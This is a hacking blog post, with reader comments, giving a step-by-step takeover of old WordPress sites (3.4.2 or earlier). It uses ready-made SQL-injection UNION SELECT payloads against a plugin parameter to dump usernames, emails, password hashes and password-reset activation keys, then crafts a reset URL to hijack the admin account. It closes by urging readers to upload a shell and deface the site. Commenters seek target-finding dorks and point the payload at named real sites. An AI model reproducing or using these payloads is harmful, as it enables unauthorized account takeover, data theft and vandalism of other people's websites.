Hacking Wordpress without hash cracking

Hey puntos today i am back with a new post for you . This post is about hacking worpdress blogs without cracking there hashes.

As we all know now the worpdress blogs are using higher alogrithem to encrypt blog passwords, which are not easy to crack. The only methods to crack these hashes is Brute Force but brute force takes too much time.


Now lets get started--->

Things you need --->

1. Wordpress version <= 3.4.2
2. Sql injection vulnerable wordpress site(make sure version of wp site is 3.4.2 or less than it)

Lets start --->

Find SQLi vulnerable worpdress site.
Like i get www.site.com?fbconnect_action=myhome&fbuserid=1

nw add this code after the wordpress site address
+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users--
Nw address will look like
http://target.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users--
lets start pwning

First go to http://target.com/wp-login.php
Now click on Lost your password ?

Now the wordpress will ask you for the username or email, enter the username or email id which you got on the field and click get password.

Now it will be saying "Check your e-mail for the confirmation link."
now what wordpress does is it sends an activation key to the email address also it sets the value of activation key in the database as well. 

we will be getting the user activation key by sqli this is what its all about.


>>Check Out Hack Android phone using Kali Linux

Add column name user_activation_key to extract
http://target/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa%E2%80%8Btion_key),7,8,9,10,11,12+from+wp_users--
Now you will be able to see the activation key

Now .. finally all we have to do is enter the following url to end of the site and edit it with your activation key and username

wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE

eg:- 
http://target.com/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=admin
Now the wordpress will ask u for ur new password enter your desired password & click change.

Now you will be able to login to site. 

Now upload shell and then deface it.

>> Check Uploading shell to a wordpress website

Note -->
1. Only for educational purpose.
2. This hack only works on Worpdress versions 3.4.2 or less than it..

Source: Hack2play
Hacking Wordpress without hash cracking Reviewed by Aditya Joshi on 21:08:00 Rating: 5

26 comments:

  1. please add about joomla too

    ReplyDelete
  2. sure bro i will try to post for joomla also :D

    ReplyDelete
  3. can u give google dork for this

    ReplyDelete
  4. Bro,please how are we going to know the version 3.4.2 when dorking it???

    ReplyDelete
  5. tested on wordpress 2.9.2 sql works great but its does not ask for a new password
    instead it sends the new password to the email

    ReplyDelete
    Replies
    1. bcoz this only works on Worpdress versions 3.4.2 or less than it.. Nt in newer versions

      Delete
  6. Add column name user_activation_key to extract

    http://target/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa%E2%80%8Btion_key),7,8,9,10,11,12+from+wp_users--

    Now you will be able to see the activation key

    where i have to create a column name?
    tnks

    ReplyDelete
  7. Nice post, thanks for sharing this wonderful and useful information with us.

    Wordpress Websites

    ReplyDelete
  8. What others paths can you use except for this one?

    http://target.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users--

    For example, will something like this work?

    http://target.com/?page_id=1242+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users--


    Or must it be an URL with the user ID in it?

    ReplyDelete
  9. after this i didnt got any email id on the field...plz help me..
    http://songspoint.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_email,0x3a,user_pass%29%E2%80%8B,7,8,9,10,11,12

    ReplyDelete
  10. Thank you for sharing excellent informations. Your web-site is very cool. I’m impressed by the details that you¡¦ve on this web site. It reveals how nicely you understand this subject. Bookmarked this web page, will come back for extra articles. You, my friend, ROCK! I found simply the information I already searched all over the place and simply couldn’t come across. What a perfect web-site. Long frocks

    ReplyDelete
  11. Take in account that this hack will not work if the site is protected by ModSecurity or any other waf, because they detect that attempt of sqli.

    ReplyDelete
  12. Nice Tips, I Might Learned Some Things New, Thank For The Share.

    Regards,
    Raja Koppula.

    ReplyDelete
  13. Hi bro,
    pleas give me my password.
    Site: http://www.streetfame.cz/stone/archive/wp-login.php
    User: w12i23d34b45o56

    Send pleas here: mystreetfame@gmail.com
    THX

    ReplyDelete
  14. This comment has been removed by a blog administrator.

    ReplyDelete
  15. This comment has been removed by a blog administrator.

    ReplyDelete
  16. This comment has been removed by a blog administrator.

    ReplyDelete
  17. This comment has been removed by a blog administrator.

    ReplyDelete
  18. This comment has been removed by a blog administrator.

    ReplyDelete
  19. This comment has been removed by a blog administrator.

    ReplyDelete
  20. Where To Get The Email Bro

    ReplyDelete
    Replies
    1. when you use following sql queries you we will get the email and user id 1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users--

      Delete
    2. you have to end the code after the page url like
      http://target.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,0x3a,user_pass)%E2%80%8B,7,8,9,10,11,12+from+wp_users--

      Delete

Share your problems but don't spam here

All Rights Reserved by Cyber Sucks © 2015 - 2016

Contact Form

Name

Email *

Message *

Powered by Blogger.